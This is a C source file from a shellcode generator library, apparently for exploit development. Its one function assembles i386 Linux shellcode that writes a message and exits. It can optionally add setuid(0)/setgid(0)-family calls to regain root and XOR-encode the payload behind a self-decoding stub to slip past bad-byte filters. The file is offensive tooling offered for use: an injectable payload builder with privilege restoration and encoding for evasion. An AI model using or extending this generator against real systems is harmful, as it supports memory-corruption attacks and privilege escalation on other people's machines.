/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */


#include "codes.h"
#include "i386_codes.h"
#include "i386_linux_codes.h"


/*
 * Function:    generate_i386_linux_write_SC()
 * Parameters:  int out         1 = stdout 
 *                              2 = stderr
 *              char *msg       the message that you want write
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *                              3 = execute setresuid(0, 0, 0)
 *              int  setgid     0 = none
 *                              1 = execute setgid(0)
 *                              2 = execute setregid(0, 0)
 *                              3 = execute setresgid(0, 0, 0)
 *              int  cripted    0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that writes a message to stdout or stderr
 *
 */

char *generate_i386_linux_write_SC(int out, char *msg, int setuid, int setgid, int cripted)
{
  int lenmsg;
  char pre_pop[64], after_pop[128], xor_code[64], *shellcode, *message;
  unsigned char xor_byte;

  // Initialize x86 Linux codes
  initialize_codes(I386, LINUX);

  message = (char *) strdup(msg);
  lenmsg = strlen(message);

   // setuid
  after_pop[0]=0;
  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s%s\0", after_pop, SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s%s\0", after_pop, SETREUID_0_0);
      break;
    case 3:
      sprintf(after_pop, "%s%s\0", after_pop, SETRESUID_0_0_0);
      break;
    }

  // setgid
  switch(setgid)
    {
    case 1:
      sprintf(after_pop, "%s%s\0", after_pop, SETGID_0);
      break;
    case 2:
      sprintf(after_pop, "%s%s\0", after_pop, SETREGID_0_0);
      break;
    case 3:
      sprintf(after_pop, "%s%s\0", after_pop, SETRESGID_0_0_0);
      break;
    }


  pre_pop[0]=0;
  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, XOR_EBX_EBX, XOR_EDX_EDX);


  // Write
  MOV_IN_AL[1] = 4;                    // Select the write() system call
  MOV_IN_DL[1] = (char) lenmsg;        // Put in EDX the lenght of the message

  if (out == 1)  ADD_BL[2] = 1; // stdout
  if (out == 2)  ADD_BL[2] = 2; // stderr

  sprintf(after_pop, "%s%s%s%s\0", after_pop, MOV_ESI_ECX, ADD_BL, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_DL, INT_80);

  // Exit
  sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (cripted == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte)||xor_check(message, xor_byte)))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte); 
      cript(message, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(message) + strlen(CALLPOP) + 1);
      SUB_EBX[2] = (char) (strlen(after_pop) + strlen(CALLPOP));
      LOOP[1] = 0xfb;
         
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_IN_CL);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_ESI_EBX, SUB_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);
      sprintf(xor_code, "%s%s", xor_code, LOOP); 
    }

  JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
  CALLPOP[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

  sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
  sprintf(after_pop, "%s%s\0", after_pop, CALLPOP);

  shellcode = (char *) malloc(strlen(pre_pop)+strlen(after_pop)+strlen(message)+strlen(xor_code) + 1);
  sprintf(shellcode, "%s%s%s%s\0", pre_pop, xor_code, after_pop, message);

  free(message);
  free_codes(I386, LINUX);

  return shellcode;
}
